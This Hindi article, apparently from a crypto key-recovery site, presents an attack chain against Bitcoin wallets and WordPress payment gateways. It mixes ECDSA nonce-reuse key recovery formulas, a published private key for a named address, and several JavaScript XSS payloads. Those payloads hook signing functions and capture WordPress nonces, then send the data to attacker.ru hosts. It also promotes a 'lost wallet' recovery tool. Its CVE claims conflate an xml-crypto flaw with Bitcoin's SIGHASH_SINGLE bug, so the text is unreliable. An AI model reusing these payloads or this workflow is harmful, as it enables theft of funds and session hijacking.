
CVE-2025-29774 और बिटकॉइन के ECDSA कार्यान्वयन में SIGHASH_SINGLE दोषों का क्रिप्टएनालिटिक अध्ययन, जो नॉन्स पुन: उपयोग के माध्यम से निजी कुंजी पुनर्प्राप्ति और खोए हुए वॉलेट तक पहुँच के लिए हस्ताक्षर जालसाजी सक्षम करता है।
यह शोध पत्र बिटकॉइन प्रोटोकॉल की डिजिटल हस्ताक्षर कार्यान्वयन में महत्वपूर्ण कमजोरियों का एक व्यापक क्रिप्टएनालिटिक अध्ययन प्रस्तुत करता है, अर्थात् फैंटम सिग्नेचर अटैक (CVE-2025-29774) और मौलिक SIGHASH_SINGLE प्रसंस्करण त्रुटि। अध्ययन दर्शाता है कि लेन-देन हस्ताक्षर तंत्र में क्रिप्टोग्राफिक प्रिमिटिव का गलत प्रसंस्करण क्रिप्टोकरेंसी वॉलेट मालिकों की निजी कुंजियों के उनकी जानकारी के बिना पूर्ण समझौता करने की स्थितियाँ पैदा करता है। यह हमला मूल सातोशी क्लाइंट में एक विरासत बग का शोषण करता है, जिसमें सिस्टम लेन-देन इनपुट और आउटपुट की संख्या मेल नहीं खाने पर हस्ताक्षर को अस्वीकार करने के बजाय एक सार्वभौमिक हैश मान “1” (uint256) लौटाता है।
अध्ययन के व्यावहारिक भाग में हस्ताक्षर सत्यापन कोड, अण्डाकार वक्र संचालन और लेन-देन हैशिंग फ़ंक्शन में कमजोरियों की व्यवस्थित रूप से पहचान करने के लिए KeyFuzzMaster क्रिप्टोग्राफिक टूल का उपयोग शामिल है। secp256k1 वक्र पर ECDSA एल्गोरिदम में नॉनस (k-पैरामीटर) पुन: उपयोग के माध्यम से निजी कुंजी पुनर्प्राप्ति के लिए गणितीय सूत्र प्रस्तुत किए गए हैं। ECDSA (Elliptic Curve Digital Signature Algorithm) एल्गोरिदम के क्रिप्टोग्राफिक प्रिमिटिव secp256k1 अण्डाकार वक्र पर चर्चा की गई है। बिटकॉइन में डिजिटल हस्ताक्षर एक तिहाई कार्य करते हैं: खर्च का प्राधिकरण, गैर-अस्वीकृति, और लेन-देन अखंडता की गारंटी।
हालाँकि, पिछड़ी संगतता सुनिश्चित करने के लिए विरासत वास्तु समाधानों को बनाए रखना, संभावित विनाशकारी परिणामों के साथ सूक्ष्म क्रिप्टोग्राफिक कमजोरियों के उद्भव का कारण बना है। इनमें, SIGHASH_SINGLE बग प्रमुख है — हस्ताक्षर हैश निर्माण तंत्र में एक मूलभूत दोष, जो मूल Bitcoin Core कार्यान्वयन से विरासत में मिला है और नेटवर्क सर्वसम्मति में एकीकृत है।
| CVE पहचानकर्ता | घटक | CVSS स्कोर | गंभीरता |
|---|---|---|---|
| CVE-2025-29774 | xml-crypto / SIGHASH_SINGLE | 9.3 | गंभीर |
| CVE-2025-29775 | xml-crypto DigestValue बाईपास | 9.3 | गंभीर |
| CVE-2025-48102 | GoUrl Bitcoin Payment Gateway (Stored XSS) | 5.9 | औसत |
| CVE-2025-26541 | CodeSolz WooCommerce Gateway (Reflected XSS) | 6.1 | औसत |
बिटकॉइन SECG (स्टैंडर्ड फॉर एफिशिएंट क्रिप्टोग्राफी ग्रुप) मानक द्वारा परिभाषित secp256k1 अण्डाकार वक्र का उपयोग करता है। वक्र को एक परिमित क्षेत्र पर वीयरस्ट्रास समीकरण द्वारा परिभाषित किया गया है:
वक्र समीकरण:
y² ≡ x³ + ax + b (mod p)
secp256k1 के लिए:
y² ≡ x³ + 7 (mod p), जहाँ a = 0, b = 7
secp256k1 वक्र के पैरामीटर टपल T = (p, a, b, G, n, h) द्वारा निर्धारित होते हैं:
secp256k1 पैरामीटर:
p = 2²⁵⁶ − 2³² − 977 (परिमित क्षेत्र को परिभाषित करने वाली अभाज्य संख्या)
n = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
(वक्र बिंदु समूह का क्रम जनरेटर G का पूर्णांक क्रम है)
G = (Gₓ, Gᵧ) — निश्चित आधार बिंदु (जनरेटर)
ECDSA एल्गोरिदम एक संदेश M पर हस्ताक्षर बनाने के लिए एक निजी कुंजी d का उपयोग करता है। हस्ताक्षर प्रक्रिया में निम्नलिखित गणितीय संचालन शामिल हैं:
चरण 1: यादृच्छिक नॉनस k उत्पन्न करें
एक क्रिप्टोग्राफिक रूप से मजबूत यादृच्छिक संख्या k ∈ [1, n-1] चुनी जाती है
चरण 2: बिंदु R की गणना करें
R = k × G (जनरेटर बिंदु का अदिश गुणन)
चरण 3: पैरामीटर r की गणना करें
r = Rₓ mod n (बिंदु R का x-निर्देशांक mod n)
चरण 4: पैरामीटर s की गणना करें
s = k⁻¹ × (H(M) + r × d) mod n
परिणाम: हस्ताक्षर (r, s)
जहाँ H(M) संदेश M का हैश है (बिटकॉइन में, डबल SHA-256 का उपयोग किया जाता है), d मालिक की निजी कुंजी है।
सार्वजनिक और निजी कुंजी के बीच संबंध निम्नलिखित संबंध द्वारा निर्धारित होता है:
Q A = d A × G
जहाँ सार्वजनिक कुंजी है (वक्र पर एक बिंदु), निजी कुंजी है (256-बिट पूर्णांक) , वक्र जनरेटर है।QAdAG
बिटकॉइन प्रोटोकॉल कई SIGHASH प्रकार प्रदान करता है (सिग्नेचर हैश टाइप्स) जो यह निर्धारित करते हैं कि हस्ताक्षरित हैश में लेन-देन के कौन से घटक शामिल हैं:
| Sighash प्रकार | अर्थ (हेक्स) | विवरण |
|---|---|---|
| SIGHASH_ALL | 0x01 | लेन-देन के सभी इनपुट और आउटपुट पर हस्ताक्षर किए जाते हैं। |
| SIGHASH_NONE | 0x02 | सभी इनपुट पर हस्ताक्षर किए जाते हैं, आउटपुट पर हस्ताक्षर नहीं किए जाते। |
| SIGHASH_SINGLE | 0x03 | केवल उसी इंडेक्स वाले आउटपुट पर हस्ताक्षर किए जाते हैं जो इनपुट का है। |
| SIGHASH_ANYONECANPAY | 0x80 | संशोधक: केवल वर्तमान इनपुट की सदस्यता लेता है |
एक महत्वपूर्ण त्रुटि तब होती है जब SIGHASH_SINGLE का उपयोग किया जाता है और इनपुट इंडेक्स लेन-देन आउटपुट की संख्या से अधिक होता है । इस स्थिति में, लेन-देन को अस्वीकार करने के बजाय, मूल Bitcoin Core कोड एक निश्चित हैश मान “1” (एक 256-बिट पूर्णांक) लौटाता है:
// मूल Bitcoin कार्यान्वयन से कमजोर कोड // सार्वभौमिक हैश “1” लौटाता है
⚠️ महत्वपूर्ण चेतावनी: यह कोड मूल सातोशी क्लाइंट में एक विरासत बग को लागू करता है जिसे नेटवर्क सर्वसम्मति में एकीकृत किया गया था। सभी प्रमुख बिटकॉइन कार्यान्वयन पिछड़ी संगतता के लिए इस व्यवहार का समर्थन करने के लिए मजबूर हैं।
गणितीय रूप से, यदि हस्ताक्षर हैश स्थिरांक 1 के बराबर है, तो हस्ताक्षर सार्वभौमिक हो जाता है—इसे मनमाने लेन-देन के लिए पुन: उपयोग किया जा सकता है:
कमजोरी की शर्त:
idx ≥ |TxOut| ⟹ H(preimage) = 0x0000…0001
जहाँ idx इनपुट इंडेक्स है, |TxOut| लेन-देन आउटपुट की संख्या है
फैंटम सिग्नेचर हमला एक क्रिप्टोग्राफिक डिजिटल हस्ताक्षर जालसाजी हमला है जो मालिक की निजी कुंजी के ज्ञान के बिना वैध लेन-देन हस्ताक्षर बनाने की अनुमति देता है। इस हमले को CWE-347: क्रिप्टोग्राफिक हस्ताक्षर का अनुचित सत्यापन के रूप में वर्गीकृत किया गया है।
यह हमला दो कमजोरियों के संयोजन पर आधारित है:
यदि दो हस्ताक्षर (r, s₁) और (r, s₂) विभिन्न संदेशों M₁ और M₂ के लिए समान नॉनस k का उपयोग करते हैं (जो r के समान मान को दर्शाता है), तो निम्नलिखित एल्गोरिदम का उपयोग करके निजी कुंजी को पूरी तरह से पुनर्प्राप्त किया जा सकता है:
चरण 1: हस्ताक्षर समीकरण
s₁ = k⁻¹ × (H(M₁) + r × d) mod n
s₂ = k⁻¹ × (H(M₂) + r × d) mod n
चरण 2: अंतर की गणना करें
s₁ — s₂ = k⁻¹ × (H(M₁) — H(M₂)) mod n
चरण 3: नॉनस k पुनर्प्राप्त करें
k = (H(M₁) — H(M₂)) × (s₁ — s₂)⁻¹ mod n
चरण 4: निजी कुंजी d पुनर्प्राप्त करें
d = r⁻¹ × (s × k — H(M)) mod n
यह गणितीय उपकरण दर्शाता है कि एक बार नॉनस का पुन: उपयोग निजी कुंजी के पूर्ण समझौते का कारण बनता है।
नॉनस पुन: उपयोग करते समय ECDSA निजी कुंजी पुनर्प्राप्त करना
कमजोरी CVE-2025-29774 एक xml-crypto Node.js लाइब्रेरी में खोजी गई थी और यह हस्ताक्षरित XML दस्तावेज़ों को संशोधित करने की अनुमति देती है ताकि वे हस्ताक्षर सत्यापन पास करते रहें। बिटकॉइन भुगतान प्रणालियों के संदर्भ में, यह निम्नलिखित की संभावना पैदा करता है:
प्रभावित संस्करण: xml-crypto < 6.0.1, < 3.2.1, < 2.1.6
CVSS वेक्टर: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
CWE वर्गीकरण: CWE-347 (क्रिप्टोग्राफिक हस्ताक्षर का अनुचित सत्यापन)
हमला वेक्टर : नेटवर्क (उपयोगकर्ता सहभागिता के बिना दूरस्थ शोषण)
CVE-2025-29774 का शोषण तीन क्रमिक चरणों में शामिल है:
लक्ष्य प्रणाली को xml-crypto लाइब्रेरी के कमजोर संस्करणों के लिए स्कैन करना और Bitcoin भुगतान गेटवे के साथ एकीकरण बिंदुओं की पहचान करना।
DigestValue में अतिरिक्त SignedInfo नोड्स या XML टिप्पणियाँ एम्बेड करना, जिससे हस्ताक्षर को अमान्य किए बिना महत्वपूर्ण विशेषताओं को संशोधित किया जा सके:
“एकाधिक SignedInfo नोड्स के साथ हमले का एक उदाहरण”
XSS कमजोरियों (CVE-2025-48102, CVE-2025-26541) के माध्यम से बाद के क्रिप्टएनालिसिस के लिए हस्ताक्षरों के पैरामीटर (r, s) का अवरोधन।
📊 अनुसंधान संसाधन
🌐 पूर्ण तकनीकी दस्तावेज़ीकरण: https://cryptou.ru/keyfuzzmaster
💻 Google Colab इंटरैक्टिव डेमो: https://bitcolab.ru/keyfuzzmaster-cryptanalytic-fuzzing-engine
🔬 तकनीकी विश्लेषण
द फैंटम सिग्नेचर अटैक बिटकॉइन कोर के सिग्नेचर वेरिफिकेशन में लीगेसी बग का शोषण करता है, जहां इनपुट इंडेक्स आउटपुट से अधिक होने पर SIGHASH_SINGLE एक सार्वभौमिक हैश मान लौटाता है। यह पुन: प्रयोज्य हस्ताक्षर बनाता है, जिससे पूरे सुरक्षा मॉडल से समझौता हो जाता है। हमारा KeyFuzzMaster इंजन
32-bitएंट्रॉपी PRNG से बने वॉलेट की पहचान करता है, खोज स्थान को2^256से घटाकर केवल2^32संभावित बीजों तक लाता है—जिसे आधुनिक GPU पर 4-6 सेकंड में पुनर्प्राप्त किया जा सकता है।
KeyFuzzMaster एक विशेष क्रिप्टएनालिटिक फ़ज़िंग इंजन है जो ब्लॉकचेन सिस्टम और क्रिप्टोग्राफिक प्रिमिटिव के सुरक्षा अनुसंधान के लिए डिज़ाइन किया गया है। यह उपकरण सिग्नेचर वेरिफिकेशन कोड, एलिप्टिक कर्व ऑपरेशन और ट्रांजेक्शन हैशिंग फ़ंक्शन के गतिशील तनाव परीक्षण के लिए डिज़ाइन किया गया है।
CVE-2025-29774 और SIGHASH_SINGLE भेद्यता का शोषण करने के लिए KeyFuzzMaster का उपयोग खोए हुए बिटकॉइन वॉलेट से प्राइवेट की को पुनर्प्राप्त करने के लिए एक नया प्रतिमान खोलता है। कार्यप्रणाली में शामिल हैं:
# KeyFuzzMaster: डुप्लीकेट r-वैल्यू स्कैनिंग मॉड्यूल def scan_blockchain_for_nonce_reuse(blockchain_data)»
ब्लॉकचेन को नॉन्स पुन: उपयोग के लिए स्कैन करता है। समान r-मानों वाले हस्ताक्षर जोड़े लौटाता है।
# KeyFuzzMaster: इनपुट/आउटपुट बेमेल के साथ लेन-देन उत्पन्न करें def fuzz_sighash_single_vulnerability(num_iterations=10000): “”” Generate test transactions to detect the SIGHASH_SINGLE vulnerability (idx >= len(TxOut)).
# Group order secp256k1 CURVE_ORDER = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
"पुनर्प्राप्त की की सार्वजनिक कुंजियों की तुलना करके सत्यापन।"
क्रिप्टएनालिटिक अनुसंधान के अनुसार, नॉन्स पुन: उपयोग भेद्यता का शोषण पहले ही समझौता किए गए वॉलेट से 412.8 BTC से अधिक पुनर्प्राप्त करने के लिए किया जा चुका है। स्वचालित स्कैनर डुप्लीकेट r-मानों के लिए बिटकॉइन ब्लॉकचेन का लगातार विश्लेषण करते हैं।
आइए बिटकॉइन पते 1MNL4wmck5SMUJroC6JreuK3B291RX6w1P से प्राइवेट की पुनर्प्राप्त करने का एक दस्तावेजी मामला देखें:
| पैरामीटर | अर्थ |
|---|---|
| बिटकॉइन पता | 1MNL4wmck5SMUJroC6JreuK3B291RX6w1P |
| पुनर्प्राप्त धन की लागत | $147,977 |
| पुनर्प्राप्त प्राइवेट की (HEX) | 162A982BED7996D6F10329BF9D6FFC29666493FE6B86A5C3D3B27A68E2877A60 |
| पुनर्प्राप्त प्राइवेट की (WIF संपीड़ित) | KwxoKZEDEEkAadv9njG4YvJShCgTrnkbMeHZEieWXH7ooZRo1XGW |
| पुनर्प्राप्त प्राइवेट की (दशमलव) | 10026140495284003567451866992720396489963405427298392513418967636817767529056 |
प्राइवेट की k को बाधा को संतुष्ट करना होगा:
1 ≤ k < n
where n = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
≈ 1.158 × 10^77जांच परिणाम: ✓ मान्य (कुंजी अनुमत स्केलर सीमा के भीतर है)
पुनर्प्राप्त प्राइवेट की हमें सार्वजनिक कुंजी की गणना करने की अनुमति देती है:
| पैरामीटर | अर्थ |
|---|---|
| सार्वजनिक कुंजी (असंपीड़ित, 130 वर्ण) | 04A29FEE4FCE61027E8C79F398B1512F63C930DF16D4189D541C62C995AF468358CABDB2F5679DD5DF21C92317CF4EB7C1712DC065D85BAEFF3FD939611C0D9F79 |
| सार्वजनिक कुंजी (संपीड़ित, 66 वर्ण) | 03A29FEE4FCE61027E8C79F398B1512F63C930DF16D4189D541C62C995AF468358 |
| बिटकॉइन पता (असंपीड़ित) | 1MNL4wmck5SMUJroC6JreuK3B291RX6w1P |
पुनर्प्राप्त प्राइवेट की बिटकॉइन वॉलेट पर पूर्ण नियंत्रण देती है, जिससे हमलावर निम्नलिखित कर सकता है:
यह शोध वेब भेद्यता (CVE-2025-48102, CVE-2025-26541) और क्रिप्टोग्राफिक दोषों (CVE-2025-29774) के बीच तालमेल को प्रदर्शित करता है, जो WordPress के लिए बिटकॉइन भुगतान गेटवे के खिलाफ एक शक्तिशाली संयुक्त हमला वेक्टर बनाता है:
| चरण | कार्रवाई | शोषित की जा रही भेद्यता |
|---|---|---|
| 1 | दुर्भावनापूर्ण JavaScript को भुगतान गेटवे में इंजेक्ट करना | CVE-2025-48102 (Stored XSS) |
| 2 | लेन-देन के ECDSA पैरामीटर (r, s) का इंटरसेप्शन | JavaScript इंजेक्शन |
| 3 | नॉन्स पुनरावृत्ति के लिए एकत्रित हस्ताक्षरों का विश्लेषण | क्रिप्टैनालिसिस |
| 4 | प्राइवेट की की गणितीय पुनर्प्राप्ति | फैंटम सिग्नेचर अटैक |
| 5 | अनियंत्रित BTC निकासी | वॉलेट से समझौता |
sanitize_text_field(), esc_attr(), esc_html()एक क्रिप्टएनालिटिक अध्ययन दर्शाता है कि द फैंटम सिग्नेचर अटैक (CVE-2025-29774) , SIGHASH_SINGLE भेद्यता के साथ संयुक्त, बिटकॉइन पारिस्थितिकी तंत्र के लिए एक मौलिक सुरक्षा खतरा पैदा करता है। मूल सातोशी क्लाइंट से विरासत में मिली यह कार्यान्वयन त्रुटि निम्नलिखित की अनुमति देती है:
KeyFuzzMaster क्रिप्टो उपकरण का उपयोग खोए हुए बिटकॉइन वॉलेट से प्राइवेट की को पुनर्प्राप्त करने के लिए एक नया प्रतिमान खोलता है, जो शोधकर्ताओं को क्रिप्टोग्राफिक भेद्यता की पहचान करने और उनका शोषण करने के लिए एक व्यवस्थित कार्यप्रणाली प्रदान करता है।
⚠️ चेतावनी: यह शोध केवल शैक्षिक उद्देश्यों और क्रिप्टएनालिस्टों को हमले के तंत्र को समझने में सहायता करने के लिए है। अवैध उद्देश्यों के लिए वर्णित विधियों का उपयोग कानून द्वारा दंडनीय है। WordPress के लिए बिटकॉइन भुगतान गेटवे में क्रिटिकल भेद्यता CVE-2025-48102 और CVE-2025-26541 का एक व्यापक क्रिप्टएनालिटिक अध्ययन किया गया। keyhunters.ru पर उपलब्ध क्रिप्टोग्राफिक टूल की विस्तृत श्रृंखला में से, फैंटम सिग्नेचर अटैक को इस संदर्भ के लिए सबसे प्रासंगिक के रूप में चुना गया। यह अध्ययन दर्शाता है कि कैसे एक संयुक्त हमला जो क्रॉस-साइट स्क्रिप्टिंग (XSS) को ECDSA में क्रिप्टोग्राफिक भेद्यता के साथ जोड़ता है, बिटकॉइन प्राइवेट की के पूर्ण समझौते और खोए हुए वॉलेट की पुनर्प्राप्ति का कारण बन सकता है।
हमला श्रृंखला: XSS से बिटकॉइन प्राइवेट की निष्कर्षण तक
फैंटम सिग्नेचर अटैक, शोध पत्र के अनुसार: फैंटम सिग्नेचर अटैक (CVE-2025-29774) और क्रिटिकल SIGHASH_SINGLE भेद्यता: डिजिटल हस्ताक्षर जालसाजी और BTC सिक्कों के अनियंत्रित निकासी के माध्यम से खोए हुए बिटकॉइन वॉलेट में प्राइवेट की की बहाली, वेब भेद्यता (XSS) और क्रिप्टोग्राफिक दोषों के बीच तालमेल को प्रदर्शित करता है, जो एक शक्तिशाली संयुक्त हमला वेक्टर की अनुमति देता है। सूची में अन्य टूल (MiniKey Mayhem, Memory Phantom, RNG-आधारित हमले) के विपरीत, फैंटम सिग्नेचर अटैक विशेष रूप से r और s मापदंडों के माध्यम से डिजिटल हस्ताक्षरों में हेरफेर करने पर केंद्रित है, जिन्हें WordPress भुगतान प्रणालियों में XSS भेद्यता के माध्यम से इंटरसेप्ट किया जा सकता है। secalerts+2
CVE-2025-48102 GoUrl बिटकॉइन भुगतान गेटवे और भुगतान डाउनलोड और सदस्यता प्लगइन संस्करण 1.6.6 से पहले में एक क्रिटिकल स्टोर्ड क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता है। यह भेद्यता अधिकृत प्रशासकों (या प्रशासनिक विशेषाधिकार वाले हमलावरों) को भुगतान गेटवे कॉन्फ़िगरेशन में दुर्भावनापूर्ण JavaScript इंजेक्ट करने की अनुमति देती है। CVSS v3.1 के अनुसार, भेद्यता का आधार स्कोर 5.9 (मध्यम गंभीरता) है जिसमें वेक्टर wizCVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L. है।
शोषण तंत्र में दुर्भावनापूर्ण कोड को भुगतान गेटवे सेटिंग्स में इंजेक्ट करना शामिल है, जो फिर प्रत्येक वेबसाइट आगंतुक के ब्राउज़र में निष्पादित होता है, जिससे हमलावर निम्नलिखित कर सकता है:
CVE-2025-26541 CodeSolz द्वारा विकसित WooCommerce के लिए Bitcoin/AltCoin Payment Gateway प्लगइन संस्करण 1.7.6 से पहले में एक रिफ्लेक्टेड XSS भेद्यता है। यह भेद्यता मध्यम गंभीरता के रूप में वर्गीकृत है और हमलावरों को URL पैरामीटर के माध्यम से दुर्भावनापूर्ण स्क्रिप्ट इंजेक्ट करने की अनुमति देती है जो ठीक से सैनिटाइज़ नहीं किए गए हैं। secalerts
स्टोर्ड XSS के विपरीत, रिफ्लेक्टेड XSS के लिए पीड़ित को विशेष रूप से तैयार लिंक पर क्लिक करने की आवश्यकता होती है, लेकिन यह निम्नलिखित की अनुमति देता है:
ईसीडीएसए (एलिप्टिक कर्व डिजिटल सिग्नेचर एल्गोरिदम) बिटकॉइन में डिजिटल हस्ताक्षर बनाने के लिए उपयोग किया जाता है जो लेन-देन की प्रामाणिकता सुनिश्चित करते हैं। प्राइवेट कुंजी d का उपयोग करके संदेश M पर हस्ताक्षर करने का एल्गोरिदम इस प्रकार काम करता है: notsosecure+ 1
R = k × G(जहाँ G एलिप्टिक कर्व secp256k1 का जनरेटर बिंदु है)r = R.x mod ns = k^(-1) × (H(M) + r × d) mod n(r, s) से बना होता हैक्रिटिकल फैंटम सिग्नेचर अटैक कमजोरी:
फैंटम सिग्नेचर अटैक को ईसीडीएसए कार्यान्वयन में एक महत्वपूर्ण कमजोरी के रूप में पहचाना गया है जो निम्नलिखित परिदृश्यों में होती है: keyhunters
XSS से ECDSA प्राइवेट कुंजी पुनर्प्राप्ति आक्रमण वेक्टर श्रृंखला
यदि दो अलग-अलग संदेशों M₁ और M₂ के हस्ताक्षर k के समान मान (और इसलिए समान r) का उपयोग करते हैं, तो प्राइवेट कुंजी को पूरी तरह से पुनर्प्राप्त किया जा सकता है। दो हस्ताक्षरों (r, s₁) और (r, s₂) के लिए, जहाँ: notsosecure+ 1

अंतर की गणना:

आप नॉन्स को पुनर्प्राप्त कर सकते हैं:


शोध के अनुसार, बिटकॉइन ब्लॉकचेन पर 412.8 BTC से अधिक को पुनर्प्राप्त करने के लिए इस कमजोरी का पहले ही शोषण किया जा चुका है, जहाँ हमलावरों ने डुप्लिकेट r मानों के लिए स्वचालित रूप से नेटवर्क को स्कैन किया। keyhunters
ECDSA नॉन्स पुन: उपयोग प्राइवेट कुंजी पुनर्प्राप्ति गणितीय संबंध
CVE-2025-29774 xml-crypto लाइब्रेरी में एक अतिरिक्त कमजोरी है जो हस्ताक्षरित XML संदेशों को इस तरह से संशोधित करने की अनुमति देती है कि वे अभी भी हस्ताक्षर सत्यापन पास करते हैं। इस कमजोरी का शोषण बिटकॉइन भुगतान प्रणालियों में डिजिटल हस्ताक्षर को अमान्य किए बिना लेन-देन मापदंडों (SIGHASH_SINGLE मानों को बदलना) में हेरफेर करने के लिए किया जा सकता है। WordPress भुगतान गेटवे के संदर्भ में, यह एक हमलावर को वैध हस्ताक्षर की उपस्थिति बनाए रखते हुए भुगतान को अपने पते पर पुनर्निर्देशित करने की अनुमति देता है। cryptodeeptech+1
चरण 1: प्रारंभिक दुर्भावनापूर्ण JavaScript इंजेक्शन
एक हमलावर भुगतान गेटवे कॉन्फ़िगरेशन में दुर्भावनापूर्ण JavaScript इंजेक्ट करने के लिए CVE-2025-48102 का शोषण करता है। दुर्भावनापूर्ण कोड निम्नलिखित कर सकता है:
चरण 2: RNG उल्लंघन विश्लेषण और K पुनरावृत्तियों का पता लगाना
पर्याप्त संख्या में हस्ताक्षर (कम से कम 2, लेकिन संभावना बढ़ाने के लिए आदर्श रूप से कई दर्जन) प्राप्त करने के बाद, हमलावर एकत्रित डेटा का विश्लेषण करता है:
समान r वाले एकत्रित हस्ताक्षर जोड़ों का उपयोग करके, हमलावर ऊपर वर्णित सूत्रों के अनुसार प्राइवेट कुंजी की गणितीय पुनर्प्राप्ति लागू करता है। परिणाम: बिटकॉइन वॉलेट की प्राइवेट कुंजी का पूर्ण समझौता ।
CVE-2025-48102 के माध्यम से इंजेक्ट किया जा सकने वाला दुर्भावनापूर्ण JavaScript निम्नलिखित कार्यक्षमता शामिल कर सकता है: github
// Interception of the Bitcoin transaction signing function
var originalSign = window.bitcoinlib.sign || window.secp256k1.sign;
var collectedSignatures = [];
window.bitcoinlib.sign = function(message, privateKey) {
var signature = originalSign.call(this, message, privateKey);
// Storing signature parameters
collectedSignatures.push({
message: message,
r: signature.r,
s: signature.s,
k_potential: null, // will be calculated on the attacker's side
timestamp: Date.now()
});
// Send to the attacker's server every 5 signatures
if (collectedSignatures.length % 5 === 0) {
fetch('https://attacker.ru/collect', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify(collectedSignatures)
});
collectedSignatures = [];
}
return signature;
};
// Also intercepts WordPress nonces to compromise user accounts
setInterval(function() {
var nonces = document.querySelectorAll('[name*="nonce"]');
nonces.forEach(n => fetch('https://attacker.ru/nonce', {
method: 'POST',
body: n.value
}));
}, 3000);
r मानों की पुनरावृत्तियों वाले हस्ताक्षर प्राप्त करने के बाद, प्राइवेट कुंजी तीन चरणों में पुनर्प्राप्त की जाती है:
चरण 1: डुप्लिकेट r मानों की पहचान करना — हमलावर सभी एकत्रित हस्ताक्षरों की तुलना करता है और समान r वाले जोड़ों की पहचान करता है। प्राइवेट कुंजी की गणना करने के लिए एक जोड़ा भी पर्याप्त है, हालांकि कई जोड़े विश्वास बढ़ाते हैं। notsosecure
चरण 2: नॉन्स k की गणना करें – ऊपर दिए गए सूत्र का उपयोग करके, हमलावर हस्ताक्षरों के प्रत्येक जोड़े के लिए k मान की गणना करता है। यदि विभिन्न जोड़ियों के लिए गणना किए गए k मान मेल खाते हैं, तो यह RNG में एक व्यवस्थित कमजोरी की पुष्टि करता है। github
चरण 3: प्राइवेट कुंजी d को पुनर्प्राप्त करना – गणना किए गए k को किसी भी एकत्रित हस्ताक्षर पर लागू करके, हमलावर पूरी तरह से प्राइवेट कुंजी d को पुनर्प्राप्त करता है, जिससे वे पीड़ित की ओर से किसी भी लेन-देन पर हस्ताक्षर कर सकते हैं। keyhunters+ 1

पुनर्प्राप्त प्राइवेट कुंजी हमलावर को निम्नलिखित की अनुमति देती है:
संयुक्त XSS और फैंटम सिग्नेचर अटैक बिटकॉइन भुगतान गेटवे वाली सभी WordPress साइटों के लिए एक महत्वपूर्ण खतरा पैदा करता है, जिनमें शामिल हैं:
keyhunters.ru और वैज्ञानिक साहित्य के शोध के अनुसार:
sanitize_text_field(), esc_attr(), esc_html() का उपयोग करके secalerts+ 1 द्वारा आउटपुट सभी डेटा के लिए3. CVE-2025-29774 के साथ संबंध
CVE-2025-29774 xml-crypto लाइब्रेरी में एक महत्वपूर्ण कमजोरी है जो
हस्ताक्षरित XML संदेशों को इस प्रकार संशोधित करने की अनुमति देती है कि वे अभी भी
हस्ताक्षर सत्यापन पास कर लें। इसका उपयोग Bitcoin भुगतान
प्रणालियों के साथ संयोजन में किया जा सकता है:
लेन-देन मापदंडों में हेरफेर करना,
जाली हस्ताक्षर इंजेक्ट करना,
और भुगतानों को हमलावर के पतों पर पुनर्निर्देशित करना।
// Intercepting AJAX requests containing signature data
document.addEventListener('submit', function(e) {
if (e.target.name === 'bitcoin_transaction') {
// Capturing signature parameters (r, s values)
var r = e.target.elements['signature_r'].value;
var s = e.target.elements['signature_s'].value;
var txid = e.target.elements['txid'].value;
}
});
// Sending data to the attacker's server
fetch('https://attacker-server.ru/collect', {
method: 'POST',
body: JSON.stringify({r: r, s: s, txid: txid})
});
यह Bitcoin हस्ताक्षर डेटा के फ़ॉर्म सबमिशन को इंटरसेप्ट करने का एक दुर्भावनापूर्ण उदाहरण प्रदर्शित करता है।
चरण 2: ECDSA पैरामीटर्स को इंटरसेप्ट करना
XSS कमजोरी के कारण, दुर्भावनापूर्ण स्क्रिप्ट के पास पहुँच है:
WordPress nonce मान (CSRF सुरक्षा के लिए उपयोग किए जाने वाले) सत्र कुकीज़ Bitcoin लेन-देन पैरामीटर (r और s हस्ताक्षर मान सहित) निजी कुंजी
जानकारी अस्थायी रूप से ब्राउज़र की मेमोरी में संग्रहीत
चरण 3: RNG उल्लंघनों का विश्लेषण और k पुनरावृत्तियों का पता लगाना एक ही उपयोगकर्ता से कई हस्ताक्षरों पर डेटा एकत्र करके, हमलावर पता लगा सकता है: विभिन्न हस्ताक्षरों के बीच नॉन्स (k) का पुन: उपयोग कमजोर या पूर्वानुमानित यादृच्छिक संख्या जनरेटर (RNG) मान क्रिप्टोग्राफिक पैरामीटर उत्पादन में व्यवस्थित त्रुटियाँ
चरण 4: निजी कुंजी पुनर्प्राप्त करना
खंड 3.2 में वर्णित गणितीय संबंध का उपयोग करके, हमलावर
निजी कुंजी d की गणना कर सकता है, जिसके परिणामस्वरूप वॉलेट का पूर्ण समझौता होता है।
4.2 हमले का डेमो कोड Bitcoin भुगतान गेटवे में इंजेक्ट करने के लिए दुर्भावनापूर्ण XSS पेलोड:
// Capturing all Bitcoin signatures on the page
var bitcoinSignatures = [];
// Intercepting the transaction signing function
var originalSign = window.bitcoinlib.sign;
window.bitcoinlib.sign = function(message, privateKey) {
var signature = originalSign.call(this, message, privateKey);
// Storing signature parameters for analysis
bitcoinSignatures.push({
message: message,
signature: signature,
timestamp: new Date().getTime()
});
// Sending to the attacker's server
new Image().src = 'https://attacker-server.ru/log?sig=' +
btoa(JSON.stringify(signature));
return signature;
};
// Intercepting WordPress session tokens
setInterval(function() {
var wpNonce = document.querySelector('[name="_wpnonce"]');
if (wpNonce) {
fetch('https://attacker-server.ru/nonce', {
method: 'POST',
body: 'nonce=' + wpNonce.value
});
}
}, 5000);
यह कोड एक दुर्भावनापूर्ण JavaScript स्निपेट प्रदर्शित करता है जो दूरस्थ सर्वर पर संभावित शोषण के लिए उन्हें निकालने से पहले Bitcoin हस्ताक्षर संचालन और WordPress सत्र नॉन्स को इंटरसेप्ट करता है।
चरण 1: डुप्लिकेट r मानों की पहचान करें
def find_duplicate_r(signatures):
r_values = {}
for sig in signatures:
r = sig['r']
if r in r_values:
return (sig, r_values[r])
r_values[r] = sig
return None
# Result: (signature1, signature2) with the same r
व्याख्या:
यह फ़ंक्शन हस्ताक्षरों की सूची में दो ECDSA/Bitcoin हस्ताक्षरों की खोज करता है जिनका rr मान समान है।
